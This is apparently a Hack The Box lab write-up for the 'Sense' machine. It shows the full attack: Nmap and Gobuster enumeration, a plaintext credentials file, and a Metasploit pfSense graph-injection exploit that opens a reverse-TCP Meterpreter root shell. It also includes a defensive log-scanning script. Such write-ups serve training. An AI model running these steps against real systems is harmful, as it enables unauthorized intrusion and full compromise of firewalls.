HTB: Sense
Hack The Box's Sense is an Easy OpenBSD machine that features pfSense, open-source firewall software. The path to root uses basic directory brute-forcing with Gobuster to find a text file containing user credentials for the firewall, followed by an injection attack to gain root access to the machine.
After starting the machine on HTB and connecting to your HTB VPN, we start by opening a terminal and pinging the machine's IP address to make sure the network is up. Make sure the IP address you enter matches the one displayed on HTB when you boot up the target machine.
ping 10.10.10.60
You should receive responses from the IP address. You can press CTRL + C to stop sending packets to the target host. After confirming the network is up and running, it's time to move to enumeration using Nmap.
Start by doing a quick service scan using Nmap. We will use the -sV switch to enable version detection. You can learn more about Nmap here.
nmap -sV 10.10.10.60
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-02 11:17 CDT
Nmap scan report for 10.10.10.60
Host is up (0.0091s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT    STATE SERVICE    VERSION
80/tcp  open  http       lighttpd 1.4.35
443/tcp open  ssl/https?

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.98 seconds
We can see a web server running. Let's navigate to the site by entering the target's IP address in our web browser. Upon inspection we can see a login page for pfSense, an open-source firewall software based on FreeBSD. A quick Google search for the default pfSense credentials shows the default username is "admin" and the password is "pfsense". When trying these default credentials, we are notified they are not correct. Let's move on to using Gobuster to brute-force directories on the server. We'll search for .php and .txt files using the directory-list-2.3-medium.txt wordlist.
gobuster dir -u https://10.10.10.60/ -t 50 -x php,txt -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://10.10.10.60/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 6690]
/help.php             (Status: 200) [Size: 6689]
/themes               (Status: 301) [Size: 0] [--> https://10.10.10.60/themes/]
/stats.php            (Status: 200) [Size: 6690]
/css                  (Status: 301) [Size: 0] [--> https://10.10.10.60/css/]
/edit.php             (Status: 200) [Size: 6689]
/includes             (Status: 301) [Size: 0] [--> https://10.10.10.60/includes/]
/license.php          (Status: 200) [Size: 6692]
/system.php           (Status: 200) [Size: 6691]
/status.php           (Status: 200) [Size: 6691]
/javascript           (Status: 301) [Size: 0] [--> https://10.10.10.60/javascript/]
/changelog.txt        (Status: 200) [Size: 271]
/classes              (Status: 301) [Size: 0] [--> https://10.10.10.60/classes/]
/exec.php             (Status: 200) [Size: 6689]
/widgets              (Status: 301) [Size: 0] [--> https://10.10.10.60/widgets/]
/graph.php            (Status: 200) [Size: 6690]
/tree                 (Status: 301) [Size: 0] [--> https://10.10.10.60/tree/]
/wizard.php           (Status: 200) [Size: 6691]
/shortcuts            (Status: 301) [Size: 0] [--> https://10.10.10.60/shortcuts/]
/pkg.php              (Status: 200) [Size: 6688]
/installer            (Status: 301) [Size: 0] [--> https://10.10.10.60/installer/]
/wizards              (Status: 301) [Size: 0] [--> https://10.10.10.60/wizards/]
/xmlrpc.php           (Status: 200) [Size: 384]
/reboot.php           (Status: 200) [Size: 6691]
/interfaces.php       (Status: 200) [Size: 6695]
/csrf                 (Status: 301) [Size: 0] [--> https://10.10.10.60/csrf/]
/system-users.txt     (Status: 200) [Size: 106]
/filebrowser          (Status: 301) [Size: 0] [--> https://10.10.10.60/filebrowser/]
After some time, we will notice /system-users.txt near the end of the output above. This file is interesting because it could contain user login information. We can view it by navigating to its path on the web server in our web browser. On my spawned HTB machine it would be https://10.10.10.60/system-users.txt. We get the following page with a support ticket containing credentials:
####Support ticket###

Please create the following user

username: Rohit
password: company defaults
We see the username listed as "Rohit" and the password as "company defaults". After testing these credentials on the pfSense login page, we see we are not granted access. But let's try the default pfSense password, "pfsense". Upon using these credentials we see we are granted access!
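Seen from the firewall's side, the Gobuster run above is a burst of requests for many different paths from one client, nearly all answered with 404. The following is an added example (not part of the original write-up) that finds such bursts in a web access log and lists which paths the scanning client received a non-404 response for; the log format, thresholds, function names and sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumption: common/combined-style access log lines. The User-Agent
# ("gobuster/3.6" above) is client-controlled, so detection keys on behaviour.
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def parse(line):
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["path"], int(m["status"])

def find_scanners(lines, window=timedelta(seconds=10), min_paths=20, min_miss_ratio=0.8):
    """Return {ip: [paths answered with a non-404]} for every client that asked
    for at least min_paths distinct paths within `window`, mostly getting 404s."""
    by_ip = defaultdict(list)
    for ip, ts, path, status in filter(None, map(parse, lines)):
        by_ip[ip].append((ts, path, status))
    flagged = {}
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r[0])
        start = 0
        for end in range(len(recs)):
            while recs[end][0] - recs[start][0] > window:
                start += 1  # slide the window forward
            burst = recs[start:end + 1]
            misses = sum(status == 404 for _, _, status in burst)
            if len({p for _, p, _ in burst}) >= min_paths and misses / len(burst) >= min_miss_ratio:
                # Burst confirmed: list what this client actually found.
                flagged[ip] = sorted({p for _, p, s in recs if s != 404})
                break
    return flagged

def sample_log():
    """Constructed log lines: one client guessing 40 paths in 2 s, one browser."""
    fmt = '{ip} - - [02/Oct/2024:11:30:{s:02d} -0500] "GET {p} HTTP/1.1" {c} 345 "-" "{ua}"'
    scan, web = ("10.10.14.6", "gobuster/3.6"), ("192.0.2.10", "Mozilla/5.0")
    lines = [fmt.format(ip=scan[0], s=i // 25, p=f"/guess{i}.txt", c=404, ua=scan[1]) for i in range(40)]
    lines += [fmt.format(ip=scan[0], s=2, p=p, c=200, ua=scan[1]) for p in ("/changelog.txt", "/system-users.txt")]
    lines += [fmt.format(ip=web[0], s=s, p=p, c=200, ua=web[1]) for s, p in ((1, "/index.php"), (5, "/css/"))]
    return lines

if __name__ == "__main__":
    for ip, found in find_scanners(sample_log()).items():
        print(ip, "enumerated paths; non-404 responses:", found)
```

The list of non-404 paths is the part worth reviewing first: any plain-text file in the web root that a scanner retrieved, such as the ticket above, should be treated as disclosed.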
Let's fire up Metasploit and search for potential exploits for pfSense:
msfconsole
Metasploit tip: To save all commands executed since start up to a file, use the makerc command

       =[ metasploit v6.3.44-dev                          ]
+ -- --=[ 2376 exploits - 1232 auxiliary - 416 post       ]
+ -- --=[ 1391 payloads - 46 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

[msf](Jobs:0 Agents:0) >> search pfsense

Matching Modules
================

   #  Name                                            Disclosure Date  Rank       Check  Description
   -  ----                                            ---------------  ----       -----  -----------
   0  exploit/unix/http/pfsense_clickjacking          2017-11-21       normal     No     Clickjacking Vulnerability In CSRF Error Page pfSense
   1  exploit/unix/http/pfsense_diag_routes_webshell  2022-02-23       excellent  Yes    pfSense Diag Routes Web Shell Upload
   2  exploit/unix/http/pfsense_config_data_exec      2023-03-18       excellent  Yes    pfSense Restore RRD Data Command Injection
   3  exploit/unix/http/pfsense_graph_injection_exec  2016-04-18       excellent  No     pfSense authenticated graph status RCE
   4  exploit/unix/http/pfsense_group_member_exec     2017-11-06       excellent  Yes    pfSense authenticated group member RCE
   5  exploit/unix/http/pfsense_pfblockerng_webshell  2022-09-05       great      Yes    pfSense plugin pfBlockerNG unauthenticated RCE as root

Interact with a module by name or index. For example info 5, use 5 or use exploit/unix/http/pfsense_pfblockerng_webshell

[msf](Jobs:0 Agents:0) >>
Option #3 is a module for an authenticated injection attack against the graph status page that results in remote code execution. You can read more about this specific exploit on Rapid7's website here. Let's select this module and fill out the required exploit options:
use 3
[*] Using configured payload php/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:0) exploit(unix/http/pfsense_graph_injection_exec) >> options

Module options (exploit/unix/http/pfsense_graph_injection_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  pfsense          yes       Password to login with
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT     443              yes       The target port (TCP)
   SSL       true             no        Negotiate SSL/TLS for outgoing connections
   USERNAME  admin            yes       User to login with
   VHOST                      no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

View the full module info with the info, or info -d command.

[msf](Jobs:0 Agents:0) exploit(unix/http/pfsense_graph_injection_exec) >> set RHOSTS 10.10.10.60
RHOSTS => 10.10.10.60
[msf](Jobs:0 Agents:0) exploit(unix/http/pfsense_graph_injection_exec) >> set USERNAME rohit
USERNAME => rohit
[msf](Jobs:0 Agents:0) exploit(unix/http/pfsense_graph_injection_exec) >> set LHOST tun0
LHOST => 10.10.14.6
[msf](Jobs:0 Agents:0) exploit(unix/http/pfsense_graph_injection_exec) >>
We set RHOSTS to the target IP address, USERNAME to "rohit", and LHOST to our desired listening IP address for the reverse TCP connection. We can now run this exploit using "exploit":
exploit
[*] Started reverse TCP handler on 10.10.14.6:4444
[*] Detected pfSense 2.1.3-RELEASE, uploading intial payload
[*] Payload uploaded successfully, executing
[*] Sending stage (39927 bytes) to 10.10.10.60
[+] Deleted uz
[*] Meterpreter session 1 opened (10.10.14.6:4444 -> 10.10.10.60:53021) at 2024-10-02 12:06:53 -0500

(Meterpreter 1)(/var/db/rrd) > getuid
Server username: root
(Meterpreter 1)(/var/db/rrd) >
Once the reverse TCP connection is successful, we can use the "getuid" command to see we now have root access to the machine! You can now navigate through the target system to obtain the root and user .txt flags.